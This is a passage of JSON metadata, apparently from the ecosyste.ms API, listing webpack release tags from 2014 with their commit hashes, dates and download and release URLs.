pack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/host